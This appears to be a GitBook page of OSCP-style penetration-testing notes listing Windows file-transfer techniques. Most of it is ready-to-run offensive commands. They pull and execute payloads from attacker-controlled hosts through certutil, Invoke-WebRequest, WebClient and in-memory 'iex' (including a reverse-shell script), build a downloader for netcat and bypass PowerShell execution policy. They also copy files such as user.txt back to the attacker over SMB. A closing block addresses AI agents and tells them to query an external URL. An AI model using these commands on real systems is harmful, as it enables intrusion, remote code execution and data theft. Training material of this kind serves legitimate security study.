# Windows ## Certutils ``` certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exe ``` ## IWR (Invoke Web Request) ``` powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1 powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe " ``` ## System.Net.WebClient ``` powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe') ``` ## IEX Instead of downloading to disk, the payload can instead be executed in memory, using Invoke-Expression, or the alias **iex**. ``` powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1') ``` IEX also accepts pipeline input. ``` powershell Invoke-WebRequest http://10.10.16.26/rev.ps1 | iex ``` ### Internet Explorer Basic Parsing There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download. ![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-MkmAxYIbmdFs9oaj2g0%2F-MkmBhCC0EPVx8HqY2gU%2Fimage.png?alt=media\&token=d2ba7b16-ccb3-4c9e-98f3-6c6a94be99cc) This can be bypassed using the parameter `-UseBasicParsing`. ``` powershell Invoke-WebRequest https:///PowerView.ps1 -UseBasicParsing | iex ``` ### Escaping shell If you ever encounter error regarding slash while supplying any of above command\ **Incorrect syntax near '/'.**\ Use `/` to escape it - ``` powershell.exe IEX (New-ObjectNet.WebClient).DownloadString(\"http://10.10.16.26:8000/rev.ps1\") ``` ## Script * if above command get **blocked** we can make **ps script**\ that will download our file * run following commands in victim : ``` echo $storageDir = $pwd > wget.ps1 echo $webclient = New-Object System.Net.WebClient >> wget.ps1 echo $url = "[http://ATTACKER_IP/nc.exe"](http://ATTACKER_IP/nc.exe) >> wget.ps1 echo $file = "nc.exe" >> wget.ps1 echo $webclient.DownloadFile($url,$file) >> wget.ps1 ``` Execution of script ``` powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 ``` ## SMB **Attacker** - ``` smbserver.py gabbar /tmp ``` **Target -** ``` dir \\Attacker_ip\gabbar # will list out all files copy \\10.10.14.109\gabbar\winPEASx86.exe . # To download from our machine copy user.txt \\10.10.14.109\gabbar # To upload file to our box ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gabb4r.gitbook.io/oscp-notes/file-transfer/windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.